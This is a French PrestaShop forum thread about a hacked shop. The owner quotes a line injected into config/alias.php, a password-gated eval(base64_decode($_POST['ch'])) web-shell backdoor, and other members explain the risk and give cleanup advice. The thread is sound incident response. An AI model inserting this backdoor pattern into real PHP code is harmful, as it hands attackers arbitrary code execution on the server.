Jump to content

fichier alias

Mühldorfer-france
 Share

Recommended Posts

Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted

j'ai comparé ce fichier alias.php avec deux autres que j'ai en sauvegarde:
la seule différence est cette ligne en plus:

if(md5($_POST['key']) == 'a..........................................e'){eval(base64_decode($_POST['ch']));}

(en a et e logiquement il y a des chiffres et des lettres que je viens de remplacer ICI par des .........)

Link to comment
Share on other sites
Mediacom87 Grand Master

Mediacom87

Posted
Posted
il y a 29 minutes, Mühldorfer-france a dit :

Bonjour, ok que dois-je faire car je en ligne tout semble ok?

Corriger le fichier en mettant la version originale de celui-ci, mais surtout savoir comment ils ont modifié le fichier en question pour boucher la faille qui permit l'accès.

 

Link to comment
Share on other sites
Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted
1 minute ago, Mediacom87 said:

Corriger le fichier en mettant la version originale de celui-ci, mais surtout savoir comment ils ont modifié le fichier en question pour boucher la faille qui permit l'accès.

 

Merci beaucoup pour votre réponse. Le hic c'est que je n'ai aucune idée de comment ils ont fait car je n'ai eu que cette indication par mon hebergeur

Link to comment
Share on other sites
Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted

Bon ca n'a pas un grand intérêt mais pour info, je viens de voir que mon hébergeur m'avait déjà envoyé cette alerte le 4 juillet et en fait leur mail était dans mes spams!!
Je pense que ce n'est pas trop grave comme hack dans mon cas car je n'ai eu aucun problème avec mon site ou mes clients entre le 4 juillet et aujourd'hui.
Je verifierai demain sur mon serveur que ce fichier alias n'a pas été modifié.
Encore merci à @Mediacom87 pour votre disponibilité et votre réactivité et votre professionnalisme.
Greg

 

Link to comment
Share on other sites
Mediacom87 Grand Master

Mediacom87

Posted
Posted

Il faudrait analyser ce que fait le bout de code rajouté dans le fichier alias, car votre site peut-être devenu un fournisseur de spam et donc que votre adresse ip serveur et votre nom de domaine se retrouve blacklisté et donc que tout vos emails passent en spam à l'avenir.

Link to comment
Share on other sites
Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted
1 minute ago, Mediacom87 said:

Il faudrait analyser ce que fait le bout de code rajouté dans le fichier alias, car votre site peut-être devenu un fournisseur de spam et donc que votre adresse ip serveur et votre nom de domaine se retrouve blacklisté et donc que tout vos emails passent en spam à l'avenir.

Merci mais je fais cela comment? 

Link to comment
Share on other sites
Mediacom87 Grand Master

Mediacom87

Posted
Posted

Il faut trouver le moyen de décodé le code en question

Mais bon, avec ce que vous avez mis, le truc vérifie que la variable key passée est bien la bonne, puis s'amuse avec la variable ch, s'il n'y a pas plus, en gros, on peut utiliser votre serveur pour faire tout et n'importe quoi.

Link to comment
Share on other sites
doekia Community Regular

doekia

Posted
Posted

Pas trop grave !! ?? !!😱

Vous avez juste une backdoor monumentale installée depuis 20 jours.

C'est donc open bar depuis cette date (au moins) et cela a de forte chance de signifier que d'autre backdoor ont été déployée - c'est la base de tout hacking.

Poser des portes partout pour espérer que lors du nettoyage vous en oubliez.

 

Ce code doit être supprimer et vous devez passer votre shop au peigne fin pour trouver tout autre modif

Link to comment
Share on other sites
Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted
5 minutes ago, doekia said:

Pas trop grave !! ?? !!😱

Vous avez juste une backdoor monumentale installée depuis 20 jours.

C'est donc open bar depuis cette date (au moins) et cela a de forte chance de signifier que d'autre backdoor ont été déployée - c'est la base de tout hacking.

Poser des portes partout pour espérer que lors du nettoyage vous en oubliez.

 

Ce code doit être supprimer et vous devez passer votre shop au peigne fin pour trouver tout autre modif

Merci beaucoup.
J'ai passé au crible le site. seuls 3 fichiers php étaient modifiés. je les ai ai supprimé et remplacés par ceux d'origines. j'ai également suivi les conseils "magiques" de 
https://www.webbax.ch/2020/09/10/prestashop-anti-hacking/
et modifié mes accés ftp.
Apres c'est le monde merveilleux d'internet où rien n'est vraiment sécurisé. 
Je pense que c'est un hack de masse et qu'ils ont fait cela à grande echelle.
Les fichiers concernés etaient:
classes/uploader
classes/alias
classes/tools
classes/dispatcher

Link to comment
Share on other sites
doekia Community Regular

doekia

Posted
Posted

1/ Vos accès FTP sont probablement la dernière chose que vous aviez à changer. Votre url BO, login et mot de passe BO en priorité après désinfection.

2/ Tu as dû te tromper d'entrée sur le blog de Webbax que tu mentionne, ce billet ne dit rien d’intéressant.

3/ J'ai un peu de mal avec le nom de vos fichiers impactés. Si l'ont doit pouvoir reconnaître la signature d'un type d'attaque précis, merci de mettre les noms exacts. Par exemple ici, je ne sais pas si vous parlez de config/alias.php ou de classes/Alias.php. Je suppose le 1er comme précisé dans votre 1er post.

4/ Quelle est votre version exacte ? Si 1.6 inférieure à 1.6.1.23, avez vous patché <admin>/filemanager ?

Link to comment
Share on other sites
Mühldorfer-france Apprentice

Mühldorfer-france

Posted
  • Author
Posted
4 minutes ago, doekia said:

1/ Vos accès FTP sont probablement la dernière chose que vous aviez à changer. Votre url BO, login et mot de passe BO en priorité après désinfection.

2/ Tu as dû te tromper d'entrée sur le blog de Webbax que tu mentionne, ce billet ne dit rien d’intéressant.

3/ J'ai un peu de mal avec le nom de vos fichiers impactés. Si l'ont doit pouvoir reconnaître la signature d'un type d'attaque précis, merci de mettre les noms exacts. Par exemple ici, je ne sais pas si vous parlez de config/alias.php ou de classes/Alias.php. Je suppose le 1er comme précisé dans votre 1er post.

4/ Quelle est votre version exacte ? Si 1.6 inférieure à 1.6.1.23, avez vous patché <admin>/filemanager ?

Bonjour
c'était config/alias.php
et pour les autres c'était dans classes/......
j'ai une version supérieur à 1.6.1.23 et dans <admin>/filemanager rien n'a été modifié. que voulez-vous dire par "patché"?
Merci
Greg

Link to comment
Share on other sites
NicolasV Rookie

NicolasV

Posted
Posted (edited)
4 hours ago, Mühldorfer-france said:

J'ai une version supérieur à 1.6.1.23 et dans <admin>/filemanager rien n'a été modifié. que voulez-vous dire par "patché"?

Bonjour @Mühldorfer-france, ce que veut dire @doekia, c'est que la version 1.6.1.23 est une version qui a patché la faille filemanager security breaches.
Patcher = Corriger


Si vous aviez eu une version < à la 1.6.1.23, vous auriez dû patcher ou mettre à jour. Mais dans votre cas, la version que vous avez est protégée. :) 

 

Edited by NicolasV (see edit history)
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...